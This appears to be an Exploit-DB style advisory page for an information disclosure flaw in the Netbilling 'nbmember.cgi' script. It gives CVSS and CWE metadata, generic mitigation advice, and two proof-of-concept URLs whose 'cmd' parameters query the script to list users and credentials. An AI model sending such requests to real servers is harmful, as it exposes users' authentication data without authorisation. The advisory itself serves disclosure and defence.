header-logo
Suggest Exploit
vendor:
nbmember.cgi script
by:
Unknown
5.5
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: nbmember.cgi script
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Information Disclosure Vulnerability in Netbilling ‘nbmember.cgi’ script

The Netbilling 'nbmember.cgi' script is prone to an information disclosure vulnerability. This vulnerability can be exploited by remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security patches and updates provided by the vendor. Additionally, access to the affected script should be restricted to trusted individuals only.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11504/info

Netbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.

http://www.example.com/cgi-bin/nbmember.cgi?cmd=test
http://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword